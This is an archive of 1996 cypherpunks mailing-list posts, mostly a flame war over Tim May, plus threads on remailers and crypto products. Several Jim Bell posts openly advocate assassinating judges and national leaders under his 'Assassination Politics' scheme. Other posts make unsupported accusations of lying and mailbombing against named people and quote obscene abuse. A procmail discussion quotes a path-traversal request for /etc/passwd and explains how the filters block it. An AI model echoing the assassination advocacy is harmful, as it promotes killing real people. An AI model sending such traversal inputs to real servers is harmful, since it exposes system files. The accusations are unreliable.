]>course. And if Detweiler's rants affected my reputation with his peers,
]>including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic,
]>well, this is to the good.
]
]We keep catching Tim May in major lies:
]
]1. Tim May attributes to me things I never said.
]
]2. Tim May was caught lying about Kelly Goen.
]
]3. Tim May is lying about Detweiler. As far as I know, Detweiler never had any
]problems with Eric Hughes et al, and Hughes doesn't have a problem with
]Detweiler. The only person Detweiler has a problem with is Tim May. Detweiler
]is 100% correct in saying that Tim May is an ignorant liar and a crook.
]
]4. Sovok VZNuri is not Detweiler - even Tim May doesn't believe his own lies.
]
]5. Archimedes (former Ludwig) Plutonium and Doctress Libby Neutopia know a lot
]more about cryptography and are far more truthful than Timothy C. May.
]
]>In the mathematics of reputations, a negative reputation held by one whose
]>own reputation is negative is a positive.
]
]_If it's true, then my reputation benefits from being slandered by the proven
]liar Tim May.

Does this answer your questions about Timmy May's veracity?

> > > If reporting to the list is accurate, I hear you have a PhD with a
> > > subject related to crypto, so presumably you would have ample
> > > knowledge to contribute technical crypto related thoughts.  I'm sure
> > > people would be interested in anything along those lines you cared to
> > > contribute, and your reputation would benefit,
> >
> > I still hope to be able discuss crypto on this mailing list (yes, my Ph.D.
> > thesis was about crypto), but I see two problems:
> >
> > 1. A lot of people have already left this list, unwilling to be subjected
> > to Tim May's rants, lies, and personal attacks. If I post something crypto-
> > relevant to this mailing list, they won't see it.
>
> The decision to keep the list open was made for reasons I agree with,
> censoring people is not the way to promote open discussions.
> Censoring people is something cypherpunks are strongly against in
> other forums, so it would seem especially hypocritical for cypherpunks
> to censor the list itself.

No more hypocritical than to have a "cypherpunks meetings" with specific
persons excluded because someone doesn't like their political views.

Here's a threat I found in our 'orphan' mailbox:

]From paul@fatmans.demon.co.uk  Thu Sep 19 23:39:14 1996
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Fri, 20 Sep 96 01:23:58 EDT
]	for paul@fatmans.demon.co.uk
]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA02597 for dvl@bwalk.dm.com; Thu, 19 Sep 96 23:39:14 -0400
]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ah16490;
]          19 Sep 96 17:22 BST
]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
]           id aa18174; 19 Sep 96 17:06 BST
]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
]	id AA843059897 ; Wed, 18 Sep 96 15:18:17 +0000
]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
]From: paul@fatmans.demon.co.uk
]To: dvl@bwalk.dm.com
]Date: Wed, 18 Sep 1996 15:18:16 +0000
]Mime-Version: 1.0
]Content-Type: text/plain; charset=US-ASCII
]Content-Transfer-Encoding: 7BIT
]Subject: Re: A daily warning regarding Timothy C. May
]Priority: normal
]X-Mailer: Pegasus Mail for Windows (v2.31)
]Message-Id: <843149202.18174.0@fatmans.demon.co.uk>
]
]
]> Timothy C. May is a lying sack of shit.
]
]Look, that is enough, I`m going to move to have you removed from the
]list if you keep this up... get a life fuckhead, if you are going to
]flame at least do it from your real address so people can killfile
]you, or maybe you believe censorship is better?
]
]
]
]  Datacomms Technologies web authoring and data security
]     Paul Bradley, Paul@fatmans.demon.co.uk
]       Http://www.fatmans.demon.co.uk/crypt/
]         "Don`t forget to mount a scratch monkey"
]
]-----BEGIN PGP PUBLIC KEY BLOCK-----
]Version: 2.6.3ia
]
]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
]mUqFH41Z7NkyO8ZFdi5GGX0=
]=CMZA
]-----END PGP PUBLIC KEY BLOCK-----

(The idiot misspelled 'dvl' for 'dlv'.) Who could possibly be in the position
to threaten to "remove" people from this mailing list? (Hint: he rants a lot.)

> > 2. Here's an example of the net-abuse being perpetrated by Tim May and his
> > merry gang of mailbombers. I posted some crypto-relevant wire clippings
> > to this mailing list. Either Tim (using an alternate account) or some pal
> > of his e-mailed it back to me with an obscenity appended.
> >
> > ]From adamsc@io-online.com  Thu Sep 19 00:00:57 1996
>         ^^^^^^^^^^^^^^^^^^^^
> why is this in part of your own headers?
>
> > ]Received: by bwalk.dm.com (1.65/waf)
> > ]	via UUCP; Thu, 19 Sep 96 00:49:21 EDT
> > ]From: Troy Varange <varange@crl.com>
>
> and this too?  Is this as a result of threading, or are you quoting
> part of another message?  Or is it a forgery?

I've _apparently received similar e-mail spam from the following addresses:
 varange@crl.com
 paul@fatmans.demon.co.uk
 adamsc@io-online.com

The most recent incident involved about 20 identical mailbombs from the latter
one. Obviously no one can tell whether they're forged or whether the e-mail
really came from these addresses. I suspect that there's just one person
behind these very similar attacks, and that this person also posts stupid
rants from got.net.

You probably weren't around when Timmy May waged a flame war against L.D.
which involved Timmy setting up a legion of "artificial persons" designed to
show massive support for Timmy's side. This is nothing new.

> > ]Subject: Re: [NEWS] Crypto-relevant wire clippings
> > ]> [...]
> > ]> CIA-backed rebels in Nicaragua played in bringing crack cocaine and
> > ]> weapons to Los Angeles and other cities.
> > ]>
> > ]> Bachus told Waters the hearing wasn't motivated by politics and that he
> > ]>
> > ]> ---
> > ]>
> > ]> Dr.Dimitri Vulis KOTM
> > ]Fuckhead.
>
> If it is more widespread than those two, perhaps you are being
> Detweilled?  He seems to enjoy that sort of thing.

Timmy May seems to enjoy thi sort of thing since he has no life and too much
free time on his hands. L.D. is a perfectly reasonable guy and he'd never do
such a thing to me. However I doubt that there are so many distinct people
involved in mailbombing me.

> People do pay attention when positive contributions are made, for
> instance I think I remember that you posted some time ago a way to
> have two plausible decryptions for one cyphertext, to enable things
> like duress keys, in terms of RSA.  The problem with this, however is
> that RSA is currently very slow to use in its pure form for messages.

I don't recall this one... My feeling about RSA is that one of these days there
will be a breakthrough allowing much faster factorization (either through a
better algorithm on a conventional computer, or by a practical quantum
computer) and then all the codes based on factorization will become essentially
plaintext. It's time to start looking for other hard problem to base PKC on.

E.g., does anyone know of any progress made on public-key cryptosystems based
on the word problem in semigroups, described in Neal Wagner and Marianne
Magyarik, _A public key cryptosystem based on the word problem_, Advances in
Cryptology: Proceedings of Crypto '84, G. R. Blakley and D. Chaum, eds.,
Lecture Notes in Computer Sciences #196, Springer Verlag, 1985, and also
mentioned in Wayne Patterson, _Mathematical Cryptology for Computer Scientists
and Mathematicians_, Rowman and Littlefield, 1987?

>From what I neard, NSA tried very hard to implement it and failed, and the
Soviets actually built a cryptosystem similar to what they described. I tried
to duplicate what the Soviets supposedly did, but without success.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 23 Sep 1996 03:04:30 +0800
To: cypherpunks@toad.com
Subject: Re: timmy waxes a widdle on AP
Message-ID: <199609221630.JAA09213@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:05 AM 9/22/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>I was reading the other day about the lessons learned from the one-time
>tax refund in 1975. Most consumers realized that this is a one-time deal
>and saved most of it, rather than spent it. On the other hand, after Reagan's
>tax cuts the consumers spent much of their newly retained income because they
>believed that the lower tax rate would continue for a few years.
>
>Likewise once an occasional gubment official in Mexico is assassinated
>often enough for the population to perceive public service as being a
>hazardous profession, they'll have trouble recruiting the replacements.
>Assassinations won't work as long as they're perceived by the public as
>zero-probability events. The public perception depends on other factors
>besides the numbers or the frequency of the hits.

That's generally correct.  The "they'll just hire replacements" argument is 
given by people who don't understand that under full operation of AP, THINGS 
WILL CHANGE!    And once things start changing, they will change very rapidly.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 23 Sep 1996 03:00:57 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
Message-ID: <199609221638.JAA09586@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:56 AM 9/22/96 -0400, Rabid Wombat wrote:
>
>
>On Sat, 21 Sep 1996, jim bell wrote:
>
>> At 01:51 PM 9/17/96 -0700, Steve Schear wrote:
>> >>On Mon, 16 Sep 1996, Steve Schear wrote:
>> >>
>> >>> Someone wrote:
>> >>> We've all heard these arguments, but are they true?  Who says so, and how
>> >>> can they be certain? Jim's suggestion has never, to my knowledge, been
>> >>> tried on a consistant, large, scale.  When all conventional alternatives
>> >>> have been tried and fail, what have we or the starving children got to
>> >>> lose?
>> >>
>> >>I think "Lord of the Flies" answers this question quite well.
>> >
>> >Does it?  LOTF was fiction.  Can you identify a recent instance in which a
>> >non-governmental organization attempted to influence political/military
>> >events via a concerted AP?
>> 
>
>Where is Jimmy Hoffa?

And it worked!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 23 Sep 1996 03:25:53 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Snake-Oil FAQ
In-Reply-To: <199609220854.DAA27487@mailhub.amaranth.com>
Message-ID: <32456CE1.B60@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
> In <v03007808ae6a2dfa2a73@[206.170.115.3]>, on 09/21/96 at 04:47 PM,
>    Lance Cottrell <loki@infonex.com> said:
> >I am setting up just such a list. I plan to award products for both
> >excellent and lousy crypto. This really should be a committee (yuch)
> >effort, so if you would like to participate, please let me know. 
> I would be intrested in this. I would like to see the following
> information made available for any product that made it on to the 
> list:
> Detailed listings of pro/cons of the product.
> Contact with the authors & listing of any rebutials they may have for 
> the cons.
> A appendix to the list explaining why the individule points are a pro 
> or a con for crypto products.

When you get right down to it, this calls for a mini-encyclopedia of 
crypto products (or even sub-products such as pre-processors or 
"encryption engines").

The basic outline for any products included (and don't forget, just 
getting included is some sort of endorsement, if you know what I mean) 
could be a feature/bug listing, using common crypto terminology, and 
could be followed by side-by-side argument paragraphs from the author 
and from a reputable review panel.

The usefulness of the list would probably depend on:
1. The participation of all those names people like to name-drop on this
   forum.
2. And/or the quality of the list itself if done without (1.) above.
   In this latter case, it could still be useful, but the variances in
   evaluation owing to personal bias would be difficult to overcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 23 Sep 1996 03:25:12 +0800
To: azur@netcom.com (Steve Schear)
Subject: Re: Kill 'em and let God sort it out, was Re: The GAK Momentum is Building...
Message-ID: <199609221651.JAA10237@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 PM 9/21/96 -0700, Steve Schear wrote:
>> jim bell wrote:
>>Naturally, you won't even consider the possibility of going outside the
>>system to solve a problem.  The rest of us notice that there are probably
>>thousands of terminally-ill people who would gladly act as a human kamikaze
>>and get rid of any judge inclined to impose such a fine, for a payment of 1%
>>of this principle amount to a family member or loved one, leaving 99%
>>available for the few other judges foolish enough to basically commit
>>suicide by taking up a futile gesture.
>>
>
>If AP came to be seen as an acceptable way for business and citizens to
>right egregious wrongs it would quickly lead to a 'law of the jungle'
>situation, which I think any sane person would reject as the cure being
>worse than the disease. 

Don't assume that means anything definitive, however.  _SOME_ sane people 
are simply WRONG!  Indeed, I'm fond of pointing out that 95% of the things 
people say are wrong about AP are, themselves, wrong. (Even by the standards 
of people who'd agree with their general conclusion.)

Suppose I could convince you that an AP-dominated world would be, in 
general, far safer, better, more just, than the status quo.  At that point, 
would you STILL say "any sane person would reject" it?  Probably not.  I 
suggest, therefore, that your statement above is based on a misunderstanding 
of AP.  Other people, people who have thought about the matter far longer 
than you, agree with me.  Moreover, after discussing AP with as many people 
as I have, it's quite predictable that a person would come to a conclusion 
based on a false belief.


 However, if governemnts (especially ours) continue
>to expand their implied authority and greatly diminishing personal
>liberties we all took for granted were inaliable human rights (in our own
>best interest, of course), a time may come when a bit of rebellion may be
>the only viable alternative for self-correction. 

Here's the big problem:  Let's suppose you think like this.  "Someday we 
_may_ have to rebel.  Not today."  Gradually, over time, the circumstances 
get worse.  However, as surprising as it may seem, we get used to the 
problems, and morever a new generation of people are born who've never seen 
freedom.  The line we draw in the sand today just appears to get further and 
further away.  We never cross it, and thus we never rebel, no matter how bad 
the circumstances get.

The most realistic position to take, I think, is to conclude that the line 
in the sand has ALREADY been crossed, long ago, and that it is high time to 
act.  The beauty of AP is that it will allow "little revolutions" to occur 
daily, until they are no longer needed.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 23 Sep 1996 03:38:00 +0800
To: "William H. Geiger III" <stewarts@ix.netcom.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <199609221651.JAA10247@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 AM 9/22/96 -0500, William H. Geiger III wrote:
>In <199609220708.AAA20288@dfw-ix2.ix.netcom.com>, on 09/22/96 at 12:09 AM,
>   Bill Stewart <stewarts@ix.netcom.com> said:
>>If the US _had_ really wanted to assassinate Saddam, they could have
>>hired professionals to do the job (like Mossad.)  Instead they
>>killed 200,000 other Iraqis, including civilians, draftees, and a
>>few tens of thousands of real soldiers.
>
>You need to take into account the politics of the region. With Saddam gone you have
>created a power vaccume that Iran would be all to happy to fill. It was for this
>reason that durring the Gulf War the US & its allias (European & Arab) did not go to
>Bagdad. They mearly wanted to knock Saddam down a notch or two not take him out.

You're thinking like a statist.  If Saddam's death leaves "a power vacuum," 
then simply kill the leadership of Iran, and any other nearby state with 
designs on the middle east.  Gee, whats the problem?  This "kill the 
leadership" system gets mighty addictive!  Where will it end? 

Which is why it isn't started in the first place.  The people who might 
start it are the ones with the most to lose if it spreads.  That's why 
Saddam is alive today.







Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 23 Sep 1996 00:49:24 +0800
To: ichudov@algebra.com
Subject: Re: How to use procmail
In-Reply-To: <199609220423.XAA00811@manifold.algebra.com>
Message-ID: <199609221455.JAA15169@homeport.org>
MIME-Version: 1.0
Content-Type: text


Igor Chudov @ home wrote:

| Adam Shostack wrote:
| > :0
| > * From bal@swissnet.ai.mit.edu
| > {
| >    :0E
| >    | pgp +batchmode -fka
| 
| Isn't this vulnerable to "deadbeef" attacks? I can also see an attack when 
| someone sends you an email with the spooofed "From " address and a user
| name that is the same (or almost the same) as that of your trusted parties.

| Then I can send you a bogus email containing a key for mrx@bogus.com 
| and next time you encrypt something for your friend nrx@provider.com,
| you will actually encrypt it with the wron key. If I intercept your
| email, your message to mrx can be compromised.

	Yes its vulnerable.  I might see it in the logs, but I've
personally verified most of the keys I care about, and they carry my
signature, at least on my local keyring.

| > # basic file server.  Only sends whats in .outbound
| > :0 
| > * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$
| > * !^Subject:.*[ /.]\.
| > * !^FROM_DAEMON
| > {
| >    # FILE=`formail -x Subject: | sed 's/.* //'`
| >    FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'`
| > 
| >   :0c 
| >   | (formail -rt -A"Precedence: junk";\
| >      cat $HOME/.outbound/$FILE) | $SENDMAIL -t
| 
| *If* .outbound has some subdirectories (say subdir), How about this email: 
| 
| From: dumbass@aol.com
| Subject: GET subdir/../../../../etc/passwd
| Reply-To: blin@algebra.com

That will fail in the second subject line:
 * !^Subject:.*[ /.]\.
 Subject: does not match '/' or '.' followed by '.'

The first Subject: line prevents absolute pathnames.
 * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$

So, AFAIK, you can't get anything but real subdirectories.  Feel free
to install it on localhost & experiment.  I was pretty careful when I
wrote it to make it safe.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Sep 1996 02:57:12 +0800
To: cypherpunks@toad.com
Subject: Re: Going AP Shit on the Internet
In-Reply-To: <Pine.SUN.3.95.960922132221.7603B-100000@netcom12>
Message-ID: <T5TNuD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jonathon <grafolog@netcom.com> writes:
> 	In the fight against terrorism, let us remember the
> 	biggest terrorist of the all --- the united states of
> 	america, which exports more death, destruction and mayhem
> 	that the rest of the world combined.

Hear, hear.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Mon, 23 Sep 1996 04:52:09 +0800
To: cypherpunks@toad.com
Subject: Jena Remailer
Message-ID: <199609221720.KAA15948@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


 lutz@as-node.jena.thur.de wrote to All:

 >> Also, is there any other remailer (now that anon.penet.fi is down)
 >> that allows one to have an anonymous address to receive
 >> email?

 l> anon@as-node.jena.thur.de. But it's is bit tricky.

The trickiest thing about it - by far - is the inscrutable English
translation of the helpfile.  I have been trying for over a week to make
any sense of how to use the remailer.  Granted, it works differently
than the other pseudonymous remailers, but the helpfile is simply
impenatrable.  Like many translations, it is grammatical but makes no
sense in spots.

>From what I can make out, this is probably a very useful and innovative
remailer that I should very much like to use.

Can any native English speaker please paraphrase the account start-up
procedure for us?

Is mixmaster@as-node.jena.thur.de a standard T-1/T-2 remailer?  Who has
the key?  Fingering this account doesn't work from West Coast USA.

Thanks for any help...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 23 Sep 1996 02:00:23 +0800
To: cypherpunks@toad.com
Subject: Continuing spam from Timmy May (or one of his clones)
Message-ID: <H8wNuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's today's sample. I'm becoming more convinced that it's Timmy May him/her/
itself, since he/she/it complains about being called Timmy. Can someone please
take a look at the headers and see if they appear to be forged from got.net?

]From paul@fatmans.demon.co.uk  Sun Sep 22 10:59:25 1996
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Sun, 22 Sep 96 11:03:58 EDT
]	for dlv
]Received: from uumx.smtp.psi.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA19743 for dlv@bwalk.dm.com; Sun, 22 Sep 96 10:59:25 -0400
]Received: from relay-2.mail.demon.net by  uumx.smtp.psi.net (8.6.12/SMI-4.1.3-PSI)
]	id KAA19486; Sun, 22 Sep 1996 10:59:00 -0400
]From: paul@fatmans.demon.co.uk
]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac22319;
]          22 Sep 96 15:23 BST
]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
]           id aa17044; 22 Sep 96 15:19 BST
]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
]	id AA843329591 ; Sat, 21 Sep 96 18:13:11 +0000
]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 1996 18:13:06 +0000
]Mime-Version: 1.0
]Content-Type: text/plain; charset=US-ASCII
]Content-Transfer-Encoding: 7BIT
]Subject: Re: CIA hacked
]Priority: normal
]X-Mailer: Pegasus Mail for Windows (v2.31)
]Message-Id: <843401964.17044.0@fatmans.demon.co.uk>
]
]
]His name is Tim, or maybe you never learnt proper manners.
]
]
]> You are confused. The above question was e-mailed to me by one of Timmy May's
]> friends. I just forward their e-mail to this mailing list. I don't read it.
]> If you have any comments about Timmy May's friends not knowing English,
]> trying to insult people, and posting non-crypto-relevant political rants,
]> address them to Timmy May and his friends.
]>
]> ---
]>
]> Dr.Dimitri Vulis KOTM
]> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
]>
]
]  Datacomms Technologies web authoring and data security
]     Paul Bradley, Paul@fatmans.demon.co.uk
]       Http://www.fatmans.demon.co.uk/crypt/
]         "Don`t forget to mount a scratch monkey"
]
]-----BEGIN PGP PUBLIC KEY BLOCK-----
]Version: 2.6.3ia
]
]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
]mUqFH41Z7NkyO8ZFdi5GGX0=
]=CMZA
]-----END PGP PUBLIC KEY BLOCK-----

Here the Timmy May clone comments on his own previous e-mail to me:

]From paul@fatmans.demon.co.uk  Sun Sep 22 10:22:38 1996
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Sun, 22 Sep 96 11:03:51 EDT
]	for dlv
]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA18447 for dlv@bwalk.dm.com; Sun, 22 Sep 96 10:22:38 -0400
]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac21657;
]          22 Sep 96 15:21 BST
]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
]           id aa17072; 22 Sep 96 15:19 BST
]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
]	id AA843327445 ; Sat, 21 Sep 96 17:37:25 +0000
]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 1996 17:37:23 +0000
]Mime-Version: 1.0
]Content-Type: text/plain; charset=US-ASCII
]Content-Transfer-Encoding: 7BIT
]Subject: Re: CIA hacked
]Priority: normal
]X-Mailer: Pegasus Mail for Windows (v2.31)
]Message-Id: <843401979.17072.0@fatmans.demon.co.uk>
]
]> >Dr. John M. Grubor created the 'net.
]>
]> Who created you? You tub of shit?
]
]
]Fuck you and fuck your cheap ass fucked up life motherfucker (look
]for the fuck redundancy index here, should be an interesting figure,
]motherfucker)
]
]good day to you
]
]
]
]  Datacomms Technologies web authoring and data security
]     Paul Bradley, Paul@fatmans.demon.co.uk
]       Http://www.fatmans.demon.co.uk/crypt/
]         "Don`t forget to mount a scratch monkey"
]
]-----BEGIN PGP PUBLIC KEY BLOCK-----
]Version: 2.6.3ia
]
]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
]mUqFH41Z7NkyO8ZFdi5GGX0=
]=CMZA
]-----END PGP PUBLIC KEY BLOCK-----


]From paul@fatmans.demon.co.uk  Sun Sep 22 10:23:35 1996
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Sun, 22 Sep 96 11:03:52 EDT
]	for dlv
]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA18472 for dlv@bwalk.dm.com; Sun, 22 Sep 96 10:23:35 -0400
]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ae22319;
]          22 Sep 96 15:23 BST
]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
]           id aa17051; 22 Sep 96 15:19 BST
]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
]	id AA843329594 ; Sat, 21 Sep 96 18:13:14 +0000
]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 1996 18:13:06 +0000
]Mime-Version: 1.0
]Content-Type: text/plain; charset=US-ASCII
]Content-Transfer-Encoding: 7BIT
]Subject: Re: Re: CIA hacked
]Priority: normal
]X-Mailer: Pegasus Mail for Windows (v2.31)
]Message-Id: <843401966.17051.0@fatmans.demon.co.uk>
]
]
]This is a further post following an earlier flame:
]
]>  You are being flamed because.
]>
]>    [X] you continued a boring useless stupid thread
]>    [ ] you repeatedly posted to the same thread that you just posted to
]>    [x] you repeatedly initiated incoherent, flaky, and mindless threads
]>    [ ] you posted a piece riddled with profanities
]>    [ ] you advocated Net censorship
]>    [ ] you SCREAMED! (used all caps)
]>    [x] you posted some sort of crap that doesn't belong in this group
]>    [ ] you posted the inanely stupid 'Make Money Fast' article
]>    [ ] you threatened others with physical harm
]>    [x] you made a bigoted statement(s)
]>    [x] you repeatedly assumed unwarranted moral or intellectual superiority
]>    [x] you are under the misapprehension that this list is your preserve
]>    [ ] you repeatedly shown lack of humor
]>    [ ] you are apparently under compulsion to post to every thread
]>    [x] you are posting an anonymous attack
]>
]>   >>> Thank you for the time you have taken to read this.  Live n' Learn.<<<
]
]Furthermore, you qualify as the celebrity fuckhead of the week, have
]a nice day.
]
]
]  Datacomms Technologies web authoring and data security
]     Paul Bradley, Paul@fatmans.demon.co.uk
]       Http://www.fatmans.demon.co.uk/crypt/
